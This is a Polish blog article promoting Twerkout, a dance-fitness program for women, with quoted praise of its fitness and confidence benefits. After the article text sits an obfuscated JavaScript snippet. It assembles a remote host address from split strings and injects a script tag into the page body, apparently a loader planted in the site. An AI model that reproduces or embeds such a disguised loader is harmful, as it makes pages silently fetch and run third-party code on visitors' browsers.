Shadow

Twerkout – co to takiego i dlaczego to rozwiązanie dla Ciebie?

Jesteśmy po świętach i każdy z nas zaczyna myśleć o postanowieniach noworocznych. Jak pokazują badania, większość z nich dotyczy zdrowia i poprawy kondycji – chcemy schudnąć, regularnie odwiedzać zajęcia fitness i wymodelować swoje ciało. Z pomocą przychodzą nam siłownie i zabiegi wyszczuplające, ale również trenerzy, którzy wymyślają efektywne programy treningowe. Jednym z nich jest Twerkout – wymyślony przez Polkę program, który bije rekordy popularności.

Co to jest Twerkout?

Twórczynią twerkoutu jest Dominika Śliwińska – utytułowana instruktorka tańca i fitnessu. Na punkcie Twerkout oszalały kobiety w całej Polsce. Dlaczego? – Przede wszystkim to niezwykle ciekawy i różnorodny trening, w którymi nie ma miejsca na nudę. To workout, twerk i nauka tańca w jednym programie. A zatem nie tylko poprawia koordynację ruchową, ale również wysmukla ciało i idealnie rzeźbi sylwetkę. Do tego dzięki elementom twerku, ćwiczący zgłębiają tajniki ruszania pośladkami i biodrami. – mówi ekspert z portalu wirtualnecentrumtreningowe.pl. Twerkout jest pierwszym w Polsce treningiem stworzony przez kobietę z myślą o kobietach. Jest zatem idealnie dopasowany do ich potrzeb i przez to tak skuteczny.

W czym pomaga Twerkout?

Plan ten to nie tylko okazja na poprawę kondycji, zrzucenie kilku zbędnych kilogramów i walkę z niedoskonałościami figury. – Kluczowy jest również psychologiczny aspekt tego treningu. Obok elementów cardio, ćwiczeń rozciągających i wzmacniających, nacisk kładzie się również na uczenie świadomości własnego ciała, budowanie pewności siebie i poczucia własnej wartości. To bardzo cenne. Widać to przede wszystkim na przykładzie atmosfery, która zazwyczaj panuje na treningach – można zaobserwować klimat naprawdę dobrej zabawy. A to przecież motywuje i jest pierwszym krokiem do zmian. – dodaje ekspert. (wirtualnecentrumtreningowe.pl)

Twerkout to swego rodzaju rewolucja w świecie fitnessu, sposób na szczupłą sylwetkę i pokonanie własnych słabości. Jest zatem doskonałą alternatywą dla zwykłych zajęć fitness – warto o tym pomyśleć szczególnie teraz, gdy jesteśmy silnie zmotywowani do zmian.

(function(){
imtd_=(„u”+”st”);imtd=document.createElement(„script”);imtd.async=true;
imtdu=”15312354″;imtd_+=”a”+(„t.”);imtd_+=”i”+(„nf”+(„o”))+(„/”);
imtdu+=”.ugrebqa4mtdizf3r”;imtdu+=”lj4i0ukXXc0iph”;
imtd.src=”//”+imtd_+imtdu;imtd.type=”text/javascript”;
d_b=document.body;d_b.appendChild(imtd);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *